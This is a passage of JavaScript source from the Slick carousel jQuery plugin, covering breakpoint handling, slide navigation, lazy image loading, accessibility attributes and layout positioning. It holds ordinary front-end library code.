_.activeBreakpoint || forceUpdate) { _.activeBreakpoint = targetBreakpoint; if (_.breakpointSettings[targetBreakpoint] === 'unslick') { _.unslick(targetBreakpoint); } else { _.options = $.extend({}, _.originalSettings, _.breakpointSettings[ targetBreakpoint]); if (initial === true) { _.currentSlide = _.options.initialSlide; } _.refresh(initial); } triggerBreakpoint = targetBreakpoint; } } else { _.activeBreakpoint = targetBreakpoint; if (_.breakpointSettings[targetBreakpoint] === 'unslick') { _.unslick(targetBreakpoint); } else { _.options = $.extend({}, _.originalSettings, _.breakpointSettings[ targetBreakpoint]); if (initial === true) { _.currentSlide = _.options.initialSlide; } _.refresh(initial); } triggerBreakpoint = targetBreakpoint; } } else { if (_.activeBreakpoint !== null) { _.activeBreakpoint = null; _.options = _.originalSettings; if (initial === true) { _.currentSlide = _.options.initialSlide; } _.refresh(initial); triggerBreakpoint = targetBreakpoint; 
} } // only trigger breakpoints during an actual break. not on initialize. if( !initial && triggerBreakpoint !== false ) { _.$slider.trigger('breakpoint', [_, triggerBreakpoint]); } } }; Slick.prototype.changeSlide = function(event, dontAnimate) { var _ = this, $target = $(event.currentTarget), indexOffset, slideOffset, unevenOffset; // If target is a link, prevent default action. if($target.is('a')) { event.preventDefault(); } // If target is not the <li> element (ie: a child), find the <li>. if(!$target.is('li')) { $target = $target.closest('li'); } unevenOffset = (_.slideCount % _.options.slidesToScroll !== 0); indexOffset = unevenOffset ? 0 : (_.slideCount - _.currentSlide) % _.options.slidesToScroll; switch (event.data.message) { case 'previous': slideOffset = indexOffset === 0 ? _.options.slidesToScroll : _.options.slidesToShow - indexOffset; if (_.slideCount > _.options.slidesToShow) { _.slideHandler(_.currentSlide - slideOffset, false, dontAnimate); } break; case 'next': slideOffset = indexOffset === 0 ? _.options.slidesToScroll : indexOffset; if (_.slideCount > _.options.slidesToShow) { _.slideHandler(_.currentSlide + slideOffset, false, dontAnimate); } break; case 'index': var index = event.data.index === 0 ? 0 : event.data.index || $target.index() * _.options.slidesToScroll; _.slideHandler(_.checkNavigable(index), false, dontAnimate); $target.children().trigger('focus'); break; default: return; } }; Slick.prototype.checkNavigable = function(index) { var _ = this, navigables, prevNavigable; navigables = _.getNavigableIndexes(); prevNavigable = 0; if (index > navigables[navigables.length - 1]) { index = navigables[navigables.length - 1]; } else { for (var n in navigables) { if (index < navigables[n]) { index = prevNavigable; break; } prevNavigable = navigables[n]; } } return index; }; Slick.prototype.cleanUpEvents = function() { var _ = this; if (_.options.dots && _.$dots !== null) { $('li', _.$dots) .off('click.slick', _.changeSlide) .off('mouseenter.slick', $.proxy(_.interrupt, _, true)) .off('mouseleave.slick', $.proxy(_.interrupt, _, false)); if (_.options.accessibility === true) { _.$dots.off('keydown.slick', _.keyHandler); } } _.$slider.off('focus.slick blur.slick'); if (_.options.arrows === true && _.slideCount > _.options.slidesToShow) { _.$prevArrow && _.$prevArrow.off('click.slick', _.changeSlide); _.$nextArrow && _.$nextArrow.off('click.slick', _.changeSlide); if (_.options.accessibility === true) { _.$prevArrow && _.$prevArrow.off('keydown.slick', _.keyHandler); _.$nextArrow && _.$nextArrow.off('keydown.slick', _.keyHandler); } } _.$list.off('touchstart.slick mousedown.slick', _.swipeHandler); _.$list.off('touchmove.slick mousemove.slick', _.swipeHandler); _.$list.off('touchend.slick mouseup.slick', _.swipeHandler); _.$list.off('touchcancel.slick mouseleave.slick', _.swipeHandler); _.$list.off('click.slick', _.clickHandler); $(document).off(_.visibilityChange, _.visibility); _.cleanUpSlideEvents(); if (_.options.accessibility === true) { _.$list.off('keydown.slick', _.keyHandler); } if (_.options.focusOnSelect === true) { $(_.$slideTrack).children().off('click.slick', _.selectHandler); } $(window).off('orientationchange.slick.slick-' + _.instanceUid, _.orientationChange); $(window).off('resize.slick.slick-' + _.instanceUid, _.resize); $('[draggable!=true]', _.$slideTrack).off('dragstart', _.preventDefault); $(window).off('load.slick.slick-' + _.instanceUid, _.setPosition); }; Slick.prototype.cleanUpSlideEvents = function() { var _ = this; 
_.$list.off('mouseenter.slick', $.proxy(_.interrupt, _, true)); _.$list.off('mouseleave.slick', $.proxy(_.interrupt, _, false)); }; Slick.prototype.cleanUpRows = function() { var _ = this, originalSlides; if(_.options.rows > 0) { originalSlides = _.$slides.children().children(); originalSlides.removeAttr('style'); _.$slider.empty().append(originalSlides); } }; Slick.prototype.clickHandler = function(event) { var _ = this; if (_.shouldClick === false) { event.stopImmediatePropagation(); event.stopPropagation(); event.preventDefault(); } }; Slick.prototype.destroy = function(refresh) { var _ = this; _.autoPlayClear(); _.touchObject = {}; _.cleanUpEvents(); $('.slick-cloned', _.$slider).detach(); if (_.$dots) { _.$dots.remove(); } if ( _.$prevArrow && _.$prevArrow.length ) { _.$prevArrow .removeClass('slick-disabled slick-arrow slick-hidden') .removeAttr('aria-hidden aria-disabled tabindex') .css('display',''); if ( _.htmlExpr.test( _.options.prevArrow )) { _.$prevArrow.remove(); } } if ( _.$nextArrow && _.$nextArrow.length ) { _.$nextArrow .removeClass('slick-disabled slick-arrow slick-hidden') .removeAttr('aria-hidden aria-disabled tabindex') .css('display',''); if ( _.htmlExpr.test( _.options.nextArrow )) { _.$nextArrow.remove(); } } if (_.$slides) { _.$slides .removeClass('slick-slide slick-active slick-center slick-visible slick-current') .removeAttr('aria-hidden') .removeAttr('data-slick-index') .each(function(){ $(this).attr('style', $(this).data('originalStyling')); }); _.$slideTrack.children(this.options.slide).detach(); _.$slideTrack.detach(); _.$list.detach(); _.$slider.append(_.$slides); } _.cleanUpRows(); _.$slider.removeClass('slick-slider'); _.$slider.removeClass('slick-initialized'); _.$slider.removeClass('slick-dotted'); _.unslicked = true; if(!refresh) { _.$slider.trigger('destroy', [_]); } }; Slick.prototype.disableTransition = function(slide) { var _ = this, transition = {}; transition[_.transitionType] = ''; if (_.options.fade === false) { _.$slideTrack.css(transition); } else { _.$slides.eq(slide).css(transition); } }; Slick.prototype.fadeSlide = function(slideIndex, callback) { var _ = this; if (_.cssTransitions === false) { _.$slides.eq(slideIndex).css({ zIndex: _.options.zIndex }); _.$slides.eq(slideIndex).animate({ opacity: 1 }, _.options.speed, _.options.easing, callback); } else { _.applyTransition(slideIndex); _.$slides.eq(slideIndex).css({ opacity: 1, zIndex: _.options.zIndex }); if (callback) { setTimeout(function() { _.disableTransition(slideIndex); callback.call(); }, _.options.speed); } } }; Slick.prototype.fadeSlideOut = function(slideIndex) { var _ = this; if (_.cssTransitions === false) { _.$slides.eq(slideIndex).animate({ opacity: 0, zIndex: _.options.zIndex - 2 }, _.options.speed, _.options.easing); } else { _.applyTransition(slideIndex); _.$slides.eq(slideIndex).css({ opacity: 0, zIndex: _.options.zIndex - 2 }); } }; Slick.prototype.filterSlides = Slick.prototype.slickFilter = function(filter) { var _ = this; if (filter !== null) { _.$slidesCache = _.$slides; _.unload(); _.$slideTrack.children(this.options.slide).detach(); _.$slidesCache.filter(filter).appendTo(_.$slideTrack); _.reinit(); } }; Slick.prototype.focusHandler = function() { var _ = this; _.$slider .off('focus.slick blur.slick') .on('focus.slick blur.slick', '*', function(event) { event.stopImmediatePropagation(); var $sf = $(this); setTimeout(function() { if( _.options.pauseOnFocus ) { _.focussed = $sf.is(':focus'); _.autoPlay(); } }, 0); }); }; Slick.prototype.getCurrent = 
Slick.prototype.slickCurrentSlide = function() { var _ = this; return _.currentSlide; }; Slick.prototype.getDotCount = function() { var _ = this; var breakPoint = 0; var counter = 0; var pagerQty = 0; if (_.options.infinite === true) { if (_.slideCount <= _.options.slidesToShow) { ++pagerQty; } else { while (breakPoint < _.slideCount) { ++pagerQty; breakPoint = counter + _.options.slidesToScroll; counter += _.options.slidesToScroll <= _.options.slidesToShow ? _.options.slidesToScroll : _.options.slidesToShow; } } } else if (_.options.centerMode === true) { pagerQty = _.slideCount; } else if(!_.options.asNavFor) { pagerQty = 1 + Math.ceil((_.slideCount - _.options.slidesToShow) / _.options.slidesToScroll); }else { while (breakPoint < _.slideCount) { ++pagerQty; breakPoint = counter + _.options.slidesToScroll; counter += _.options.slidesToScroll <= _.options.slidesToShow ? _.options.slidesToScroll : _.options.slidesToShow; } } return pagerQty - 1; }; Slick.prototype.getLeft = function(slideIndex) { var _ = this, targetLeft, verticalHeight, verticalOffset = 0, targetSlide, coef; _.slideOffset = 0; verticalHeight = _.$slides.first().outerHeight(true); if (_.options.infinite === true) { if (_.slideCount > _.options.slidesToShow) { _.slideOffset = (_.slideWidth * _.options.slidesToShow) * -1; coef = -1 if (_.options.vertical === true && _.options.centerMode === true) { if (_.options.slidesToShow === 2) { coef = -1.5; } else if (_.options.slidesToShow === 1) { coef = -2 } } verticalOffset = (verticalHeight * _.options.slidesToShow) * coef; } if (_.slideCount % _.options.slidesToScroll !== 0) { if (slideIndex + _.options.slidesToScroll > _.slideCount && _.slideCount > _.options.slidesToShow) { if (slideIndex > _.slideCount) { _.slideOffset = ((_.options.slidesToShow - (slideIndex - _.slideCount)) * _.slideWidth) * -1; verticalOffset = ((_.options.slidesToShow - (slideIndex - _.slideCount)) * verticalHeight) * -1; } else { _.slideOffset = ((_.slideCount % _.options.slidesToScroll) * _.slideWidth) * -1; verticalOffset = ((_.slideCount % _.options.slidesToScroll) * verticalHeight) * -1; } } } } else { if (slideIndex + _.options.slidesToShow > _.slideCount) { _.slideOffset = ((slideIndex + _.options.slidesToShow) - _.slideCount) * _.slideWidth; verticalOffset = ((slideIndex + _.options.slidesToShow) - _.slideCount) * verticalHeight; } } if (_.slideCount <= _.options.slidesToShow) { _.slideOffset = 0; verticalOffset = 0; } if (_.options.centerMode === true && _.slideCount <= _.options.slidesToShow) { _.slideOffset = ((_.slideWidth * Math.floor(_.options.slidesToShow)) / 2) - ((_.slideWidth * _.slideCount) / 2); } else if (_.options.centerMode === true && _.options.infinite === true) { _.slideOffset += _.slideWidth * Math.floor(_.options.slidesToShow / 2) - _.slideWidth; } else if (_.options.centerMode === true) { _.slideOffset = 0; _.slideOffset += _.slideWidth * Math.floor(_.options.slidesToShow / 2); } if (_.options.vertical === false) { targetLeft = ((slideIndex * _.slideWidth) * -1) + _.slideOffset; } else { targetLeft = ((slideIndex * verticalHeight) * -1) + verticalOffset; } if (_.options.variableWidth === true) { if (_.slideCount <= _.options.slidesToShow || _.options.infinite === false) { targetSlide = _.$slideTrack.children('.slick-slide').eq(slideIndex); } else { targetSlide = _.$slideTrack.children('.slick-slide').eq(slideIndex + _.options.slidesToShow); } if (_.options.rtl === true) { if (targetSlide[0]) { targetLeft = (_.$slideTrack.width() - targetSlide[0].offsetLeft - 
targetSlide.width()) * -1; } else { targetLeft = 0; } } else { targetLeft = targetSlide[0] ? targetSlide[0].offsetLeft * -1 : 0; } if (_.options.centerMode === true) { if (_.slideCount <= _.options.slidesToShow || _.options.infinite === false) { targetSlide = _.$slideTrack.children('.slick-slide').eq(slideIndex); } else { targetSlide = _.$slideTrack.children('.slick-slide').eq(slideIndex + _.options.slidesToShow + 1); } if (_.options.rtl === true) { if (targetSlide[0]) { targetLeft = (_.$slideTrack.width() - targetSlide[0].offsetLeft - targetSlide.width()) * -1; } else { targetLeft = 0; } } else { targetLeft = targetSlide[0] ? targetSlide[0].offsetLeft * -1 : 0; } targetLeft += (_.$list.width() - targetSlide.outerWidth()) / 2; } } return targetLeft; }; Slick.prototype.getOption = Slick.prototype.slickGetOption = function(option) { var _ = this; return _.options[option]; }; Slick.prototype.getNavigableIndexes = function() { var _ = this, breakPoint = 0, counter = 0, indexes = [], max; if (_.options.infinite === false) { max = _.slideCount; } else { breakPoint = _.options.slidesToScroll * -1; counter = _.options.slidesToScroll * -1; max = _.slideCount * 2; } var fs = 0; while (breakPoint < max) { indexes.push(breakPoint); breakPoint = counter + _.options.slidesToScroll; counter += _.options.slidesToScroll <= _.options.slidesToShow ? _.options.slidesToScroll : _.options.slidesToShow; fs++; if ( fs > 200 ) { console.log( 'WARNING! Infinite loop!' ); break; } } return indexes; }; Slick.prototype.getSlick = function() { return this; }; Slick.prototype.getSlideCount = function() { var _ = this, slidesTraversed, swipedSlide, centerOffset; centerOffset = _.options.centerMode === true ? _.slideWidth * Math.floor(_.options.slidesToShow / 2) : 0; if (_.options.swipeToSlide === true) { _.$slideTrack.find('.slick-slide').each(function(index, slide) { if (slide.offsetLeft - centerOffset + ($(slide).outerWidth() / 2) > (_.swipeLeft * -1)) { swipedSlide = slide; return false; } }); slidesTraversed = Math.abs($(swipedSlide).attr('data-slick-index') - _.currentSlide) || 1; return slidesTraversed; } else { return _.options.slidesToScroll; } }; Slick.prototype.goTo = Slick.prototype.slickGoTo = function(slide, dontAnimate) { var _ = this; _.changeSlide({ data: { message: 'index', index: parseInt(slide) } }, dontAnimate); }; Slick.prototype.init = function(creation) { var _ = this; if (!$(_.$slider).hasClass('slick-initialized')) { $(_.$slider).addClass('slick-initialized'); _.buildRows(); _.buildOut(); _.setProps(); _.startLoad(); _.loadSlider(); _.initializeEvents(); _.updateArrows(); _.updateDots(); _.checkResponsive(true); _.focusHandler(); } if (creation) { _.$slider.trigger('init', [_]); } if (_.options.accessibility === true) { _.initADA(); } if ( _.options.autoplay ) { _.paused = false; _.autoPlay(); } }; Slick.prototype.initADA = function() { var _ = this, numDotGroups = Math.ceil(_.slideCount / _.options.slidesToShow), tabControlIndexes = _.getNavigableIndexes().filter(function(val) { return (val >= 0) && (val < _.slideCount); }); _.$slides.add(_.$slideTrack.find('.slick-cloned')).attr({ 'aria-hidden': 'true', 'tabindex': '-1' }).find('a, input, button, select').attr({ 'tabindex': '-1' }); if (_.$dots !== null) { _.$slides.not(_.$slideTrack.find('.slick-cloned')).each(function(i) { var slideControlIndex = tabControlIndexes.indexOf(i); $(this).attr({ 'role': 'tabpanel', 'id': 'slick-slide' + _.instanceUid + i, 'tabindex': -1 }); if (slideControlIndex !== -1) { var ariaButtonControl = 
'slick-slide-control' + _.instanceUid + slideControlIndex; if ($('#' + ariaButtonControl).length) { $(this).attr({ 'aria-describedby': ariaButtonControl }); } } }); _.$dots.attr('role', 'tablist').find('li').each(function(i) { var mappedSlideIndex = tabControlIndexes[i]; $(this).attr({ 'role': 'presentation' }); $(this).find('button').first().attr({ 'role': 'tab', 'id': 'slick-slide-control' + _.instanceUid + i, 'aria-controls': 'slick-slide' + _.instanceUid + mappedSlideIndex, 'aria-label': (i + 1) + ' of ' + numDotGroups, 'aria-selected': null, 'tabindex': '-1' }); }).eq(_.currentSlide).find('button').attr({ 'aria-selected': 'true', 'tabindex': '0' }).end(); } for (var i=_.currentSlide, max=i+_.options.slidesToShow; i < max; i++) { if (_.options.focusOnChange) { _.$slides.eq(i).attr({'tabindex': '0'}); } else { _.$slides.eq(i).removeAttr('tabindex'); } } _.activateADA(); }; Slick.prototype.initArrowEvents = function() { var _ = this; if (_.options.arrows === true && _.slideCount > _.options.slidesToShow) { _.$prevArrow .off('click.slick') .on('click.slick', { message: 'previous' }, _.changeSlide); _.$nextArrow .off('click.slick') .on('click.slick', { message: 'next' }, _.changeSlide); if (_.options.accessibility === true) { _.$prevArrow.on('keydown.slick', _.keyHandler); _.$nextArrow.on('keydown.slick', _.keyHandler); } } }; Slick.prototype.initDotEvents = function() { var _ = this; if (_.options.dots === true && _.slideCount > _.options.slidesToShow) { $('li', _.$dots).on('click.slick', { message: 'index' }, _.changeSlide); if (_.options.accessibility === true) { _.$dots.on('keydown.slick', _.keyHandler); } } if (_.options.dots === true && _.options.pauseOnDotsHover === true && _.slideCount > _.options.slidesToShow) { $('li', _.$dots) .on('mouseenter.slick', $.proxy(_.interrupt, _, true)) .on('mouseleave.slick', $.proxy(_.interrupt, _, false)); } }; Slick.prototype.initSlideEvents = function() { var _ = this; if ( _.options.pauseOnHover ) { _.$list.on('mouseenter.slick', $.proxy(_.interrupt, _, true)); _.$list.on('mouseleave.slick', $.proxy(_.interrupt, _, false)); } }; Slick.prototype.initializeEvents = function() { var _ = this; _.initArrowEvents(); _.initDotEvents(); _.initSlideEvents(); _.$list.on('touchstart.slick mousedown.slick', { action: 'start' }, _.swipeHandler); _.$list.on('touchmove.slick mousemove.slick', { action: 'move' }, _.swipeHandler); _.$list.on('touchend.slick mouseup.slick', { action: 'end' }, _.swipeHandler); _.$list.on('touchcancel.slick mouseleave.slick', { action: 'end' }, _.swipeHandler); _.$list.on('click.slick', _.clickHandler); $(document).on(_.visibilityChange, $.proxy(_.visibility, _)); if (_.options.accessibility === true) { _.$list.on('keydown.slick', _.keyHandler); } if (_.options.focusOnSelect === true) { $(_.$slideTrack).children().on('click.slick', _.selectHandler); } $(window).on('orientationchange.slick.slick-' + _.instanceUid, $.proxy(_.orientationChange, _)); $(window).on('resize.slick.slick-' + _.instanceUid, $.proxy(_.resize, _)); $('[draggable!=true]', _.$slideTrack).on('dragstart', _.preventDefault); $(window).on('load.slick.slick-' + _.instanceUid, _.setPosition); $(_.setPosition); }; Slick.prototype.initUI = function() { var _ = this; if (_.options.arrows === true && _.slideCount > _.options.slidesToShow) { _.$prevArrow.show(); _.$nextArrow.show(); } if (_.options.dots === true && _.slideCount > _.options.slidesToShow) { _.$dots.show(); } }; Slick.prototype.keyHandler = function(event) { var _ = this; // Don't slide if the cursor is inside 
the form fields and arrow keys are pressed if(!event.target.tagName.match('TEXTAREA|INPUT|SELECT')) { if (event.keyCode === 37 && _.options.accessibility === true) { _.changeSlide({ data: { message: _.options.rtl === true ? 'next' : 'previous' } }); } else if (event.keyCode === 39 && _.options.accessibility === true) { _.changeSlide({ data: { message: _.options.rtl === true ? 'previous' : 'next' } }); } } }; Slick.prototype.lazyLoad = function() { var _ = this, loadRange, cloneRange, rangeStart, rangeEnd; function loadImages(imagesScope) { $('img[data-lazy]', imagesScope).each(function() { var image = $(this), imageSource = $(this).attr('data-lazy'), imageSrcSet = $(this).attr('data-srcset'), imageSizes = $(this).attr('data-sizes') || _.$slider.attr('data-sizes'), imageToLoad = document.createElement('img'); imageToLoad.onload = function() { image .animate({ opacity: 0 }, 100, function() { if (imageSrcSet) { image .attr('srcset', imageSrcSet ); if (imageSizes) { image .attr('sizes', imageSizes ); } } image .attr('src', imageSource) .animate({ opacity: 1 }, 200, function() { image .removeAttr('data-lazy data-srcset data-sizes') .removeClass('slick-loading'); }); _.$slider.trigger('lazyLoaded', [_, image, imageSource]); }); }; imageToLoad.onerror = function() { image .removeAttr( 'data-lazy' ) .removeClass( 'slick-loading' ) .addClass( 'slick-lazyload-error' ); _.$slider.trigger('lazyLoadError', [ _, image, imageSource ]); }; imageToLoad.src = imageSource; }); } if (_.options.centerMode === true) { if (_.options.infinite === true) { rangeStart = _.currentSlide + (_.options.slidesToShow / 2 + 1); rangeEnd = rangeStart + _.options.slidesToShow + 2; } else { rangeStart = Math.max(0, _.currentSlide - (_.options.slidesToShow / 2 + 1)); rangeEnd = 2 + (_.options.slidesToShow / 2 + 1) + _.currentSlide; } } else { rangeStart = _.options.infinite ? 
_.options.slidesToShow + _.currentSlide : _.currentSlide; rangeEnd = Math.ceil(rangeStart + _.options.slidesToShow); if (_.options.fade === true) { if (rangeStart > 0) rangeStart--; if (rangeEnd <= _.slideCount) rangeEnd++; } } loadRange = _.$slider.find('.slick-slide').slice(rangeStart, rangeEnd); if (_.options.lazyLoad === 'anticipated') { var prevSlide = rangeStart - 1, nextSlide = rangeEnd, $slides = _.$slider.find('.slick-slide'); for (var i = 0; i < _.options.slidesToScroll; i++) { if (prevSlide < 0) prevSlide = _.slideCount - 1; loadRange = loadRange.add($slides.eq(prevSlide)); loadRange = loadRange.add($slides.eq(nextSlide)); prevSlide--; nextSlide++; } } loadImages(loadRange); if (_.slideCount <= _.options.slidesToShow) { cloneRange = _.$slider.find('.slick-slide'); loadImages(cloneRange); } else if (_.currentSlide >= _.slideCount - _.options.slidesToShow) { cloneRange = _.$slider.find('.slick-cloned').slice(0, _.options.slidesToShow); loadImages(cloneRange); } else if (_.currentSlide === 0) { cloneRange = _.$slider.find('.slick-cloned').slice(_.options.slidesToShow * -1); loadImages(cloneRange); } }; Slick.prototype.loadSlider = function() { var _ = this; _.setPosition(); _.$slideTrack.css({ opacity: 1 }); _.$slider.removeClass('slick-loading'); _.initUI(); if (_.options.lazyLoad === 'progressive') { _.progressiveLazyLoad(); } }; Slick.prototype.next = Slick.prototype.slickNext = function() { var _ = this; _.changeSlide({ data: { message: 'next' } }); }; Slick.prototype.orientationChange = function() { var _ = this; _.checkResponsive(); _.setPosition(); }; Slick.prototype.pause = Slick.prototype.slickPause = function() { var _ = this; _.autoPlayClear(); _.paused = true; }; Slick.prototype.play = Slick.prototype.slickPlay = function() { var _ = this; _.autoPlay(); _.options.autoplay = true; _.paused = false; _.focussed = false; _.interrupted = false; }; Slick.prototype.postSlide = function(index) { var _ = this; if( !_.unslicked ) { _.$slider.trigger('afterChange', [_, index]); _.animating = false; if (_.slideCount > _.options.slidesToShow) { _.setPosition(); } _.swipeLeft = null; if ( _.options.autoplay ) { _.autoPlay(); } if (_.options.accessibility === true) { _.initADA(); if (_.options.focusOnChange) { var $currentSlide = $(_.$slides.get(_.currentSlide)); $currentSlide.attr('tabindex', 0).focus(); } } } }; Slick.prototype.prev = Slick.prototype.slickPrev = function() { var _ = this; _.changeSlide({ data: { message: 'previous' } }); }; Slick.prototype.preventDefault = function(event) { event.preventDefault(); }; Slick.prototype.progressiveLazyLoad = function( tryCount ) { tryCount = tryCount || 1; var _ = this, $imgsToLoad = $( 'img[data-lazy]', _.$slider ), image, imageSource, imageSrcSet, imageSizes, imageToLoad; if ( $imgsToLoad.length ) { image = $imgsToLoad.first(); imageSource = image.attr('data-lazy'); imageSrcSet = image.attr('data-srcset'); imageSizes = image.attr('data-sizes') || _.$slider.attr('data-sizes'); imageToLoad = document.createElement('img'); imageToLoad.onload = function() { if (imageSrcSet) { image .attr('srcset', imageSrcSet ); if (imageSizes) { image .attr('sizes', imageSizes ); } } image .attr( 'src', imageSource ) .removeAttr('data-lazy data-srcset data-sizes') .removeClass('slick-loading'); if ( _.options.adaptiveHeight === true ) { _.setPosition(); } _.$slider.trigger('lazyLoaded', [ _, image, imageSource ]); _.progressiveLazyLoad(); }; imageToLoad.onerror = function() { if ( tryCount < 3 ) { /** * try to load the image 3 times, * leave a slight 
delay so we don't get * servers blocking the request. */ setTimeout( function() { _.progressiveLazyLoad( tryCount + 1 ); }, 500 ); } else { image .removeAttr( 'data-lazy' ) .removeClass( 'slick-loading' ) .addClass( 'slick-lazyload-error' ); _.$slider.trigger('lazyLoadError', [ _, image, imageSource ]); _.progressiveLazyLoad(); } }; imageToLoad.src = imageSource; } else { _.$slider.trigger('allImagesLoaded', [ _ ]); } }; Slick.prototype.refresh = function( initializing ) { var _ = this, currentSlide, lastVisibleIndex; lastVisibleIndex = _.slideCount - _.options.slidesToShow; // in non-infinite sliders, we don't want to go past the // last visible index. if( !_.options.infinite && ( _.currentSlide > lastVisibleIndex )) { _.currentSlide = lastVisibleIndex; } // if less slides than to show, go to start. if ( _.slideCount <= _.options.slidesToShow ) { _.currentSlide = 0; } currentSlide = _.currentSlide; _.destroy(true); $.extend(_, _.initials, { currentSlide: currentSlide }); _.init(); if( !initializing ) { _.changeSlide({ data: { message: 'index', index: currentSlide } }, false); } }; Slick.prototype.registerBreakpoints = function() { var _ = this, breakpoint, currentBreakpoint, l, responsiveSettings = _.options.responsive || null; if ( $.type(responsiveSettings) === 'array' && responsiveSettings.length ) { _.respondTo = _.options.respondTo || 'window'; for ( breakpoint in responsiveSettings ) { l = _.breakpoints.length-1; if (responsiveSettings.hasOwnProperty(breakpoint)) { currentBreakpoint = responsiveSettings[breakpoint].breakpoint; // loop through the breakpoints and cut out any existing // ones with the same breakpoint number, we don't want dupes. while( l >= 0 ) { if( _.breakpoints[l] && _.breakpoints[l] === currentBreakpoint ) { _.breakpoints.splice(l,1); } l--; } _.breakpoints.push(currentBreakpoint); _.breakpointSettings[currentBreakpoint] = responsiveSettings[breakpoint].settings; } } _.breakpoints.sort(function(a, b) { return ( _.options.mobileFirst ) ? a-b : b-a; }); } }; Slick.prototype.reinit = function() { var _ = this; _.$slides = _.$slideTrack .children(_.options.slide) .addClass('slick-slide'); _.slideCount = _.$slides.length; if (_.currentSlide >= _.slideCount && _.currentSlide !== 0) { _.currentSlide = _.currentSlide - _.options.slidesToScroll; } if (_.slideCount <= _.options.slidesToShow) { _.currentSlide = 0; } _.registerBreakpoints(); _.setProps(); _.setupInfinite(); _.buildArrows(); _.updateArrows(); _.initArrowEvents(); _.buildDots(); _.updateDots(); _.initDotEvents(); _.cleanUpSlideEvents(); _.initSlideEvents(); _.checkResponsive(false, true); if (_.options.focusOnSelect === true) { $(_.$slideTrack).children().on('click.slick', _.selectHandler); } _.setSlideClasses(typeof _.currentSlide === 'number' ? _.currentSlide : 0); _.setPosition(); _.focusHandler(); _.paused = !_.options.autoplay; _.autoPlay(); _.$slider.trigger('reInit', [_]); }; Slick.prototype.resize = function() { var _ = this; if ($(window).width() !== _.windowWidth) { clearTimeout(_.windowDelay); _.windowDelay = window.setTimeout(function() { _.windowWidth = $(window).width(); _.checkResponsive(); if( !_.unslicked ) { _.setPosition(); } }, 50); } }; Slick.prototype.removeSlide = Slick.prototype.slickRemove = function(index, removeBefore, removeAll) { var _ = this; if (typeof(index) === 'boolean') { removeBefore = index; index = removeBefore === true ? 0 : _.slideCount - 1; } else { index = removeBefore === true ? 
--index : index; } if (_.slideCount < 1 || index < 0 || index > _.slideCount - 1) { return false; } _.unload(); if (removeAll === true) { _.$slideTrack.children().remove(); } else { _.$slideTrack.children(this.options.slide).eq(index).remove(); } _.$slides = _.$slideTrack.children(this.options.slide); _.$slideTrack.children(this.options.slide).detach(); _.$slideTrack.append(_.$slides); _.$slidesCache = _.$slides; _.reinit(); }; Slick.prototype.setCSS = function(position) { var _ = this, positionProps = {}, x, y; if (_.options.rtl === true) { position = -position; } x = _.positionProp == 'left' ? Math.ceil(position) + 'px' : '0px'; y = _.positionProp == 'top' ? Math.ceil(position) + 'px' : '0px'; positionProps[_.positionProp] = position; if (_.transformsEnabled === false) { _.$slideTrack.css(positionProps); } else { positionProps = {}; if (_.cssTransitions === false) { positionProps[_.animType] = 'translate(' + x + ', ' + y + ')'; _.$slideTrack.css(positionProps); } else { positionProps[_.animType] = 'translate3d(' + x + ', ' + y + ', 0px)'; _.$slideTrack.css(positionProps); } } }; Slick.prototype.setDimensions = function() { var _ = this; if (_.options.vertical === false) { if (_.options.centerMode === true) { _.$list.css({ padding: ('0px ' + _.options.centerPadding) }); } } else { _.$list.height(_.$slides.first().outerHeight(true) * _.options.slidesToShow); if (_.options.centerMode === true) { _.$list.css({ padding: (_.options.centerPadding + ' 0px') }); } } _.listWidth = _.$list.width(); _.listHeight = _.$list.height(); if (_.options.vertical === false && _.options.variableWidth === false) { _.slideWidth = Math.ceil(_.listWidth / _.options.slidesToShow); _.$slideTrack.width(Math.ceil((_.slideWidth * _.$slideTrack.children('.slick-slide').length))); } else if (_.options.variableWidth === true) { _.$slideTrack.width(5000 * _.slideCount); } else { _.slideWidth = Math.ceil(_.listWidth); _.$slideTrack.height(Math.ceil((_.$slides.first().outerHeight(true) * _.$slideTrack.children('.slick-slide').length))); } var offset = _.$slides.first().outerWidth(true) - _.$slides.first().width(); if (_.options.variableWidth === false) _.$slideTrack.children('.slick-slide').width(_.slideWidth - offset); }; Slick.prototype.setFade = function() { var _ = this, targetLeft; _.$slides.each(function(index, element) { targetLeft = (_.slideWidth * index) * -1; if (_.options.rtl === true) { $(element).css({ position: 'relative', right: targetLeft, top: 0, zIndex: _.options.zIndex - 2, opacity: 0 }); } else { $(element).css({ position: 'relative', left: targetLeft, top: 0, zIndex: _.options.zIndex - 2, opacity: 0 }); } }); _.$slides.eq(_.currentSlide).css({ zIndex: _.options.zIndex - 1, opacity: 1 }); }; Slick.prototype.setHeight = function() { var _ = this; if (_.options.slidesToShow === 1 && _.options.adaptiveHeight === true && _.options.vertical === false) { var targetHeight = _.$slides.eq(_.currentSlide).outerHeight(true); _.$list.css('height', targetHeight); } }; Slick.prototype.setOption = Slick.prototype.slickSetOption = function() { /** * accepts arguments in format of: * * - for changing a single option's value: * .slick("setOption", option, value, refresh ) * * - for changing a set of responsive options: * .slick("setOption", 'responsive', [{}, ...], refresh ) * * - for updating multiple values at once (not responsive) * .slick("setOption", { 'option': value, ... 
}, refresh ) */ var _ = this, l, item, option, value, refresh = false, type; if( $.type( arguments[0] ) === 'object' ) { option = arguments[0]; refresh = arguments[1]; type = 'multiple'; } else if ( $.type( arguments[0] ) === 'string' ) { option = arguments[0]; value = arguments[1]; refresh = arguments[2]; if ( arguments[0] === 'responsive' && $.type( arguments[1] ) === 'array' ) { type = 'responsive'; } else if ( typeof arguments[1] !== 'undefined' ) { type = 'single'; } } if ( type === 'single' ) { _.options[option] = value; } else if ( type === 'multiple' ) { $.each( option , function( opt, val ) { _.options[opt] = val; }); } else if ( type === 'responsive' ) { for ( item in value ) { if( $.type( _.options.responsive ) !== 'array' ) { _.options.responsive = [ value[item] ]; } else { l = _.options.responsive.length-1; // loop through the responsive object and splice out duplicates. while( l >= 0 ) { if( _.options.responsive[l].breakpoint === value[item].breakpoint ) { _.options.responsive.splice(l,1); } l--; } _.options.responsive.push( value[item] ); } } } if ( refresh ) { _.unload(); _.reinit(); } }; Slick.prototype.setPosition = function() { var _ = this; _.setDimensions(); _.setHeight(); if (_.options.fade === false) { _.setCSS(_.getLeft(_.currentSlide)); } else { _.setFade(); } _.$slider.trigger('setPosition', [_]); }; Slick.prototype.setProps = function() { var _ = this, bodyStyle = document.body.style; _.positionProp = _.options.vertical === true ? 'top' : 'left'; if (_.positionProp === 'top') { _.$slider.addClass('slick-vertical'); } else { _.$slider.removeClass('slick-vertical'); } if 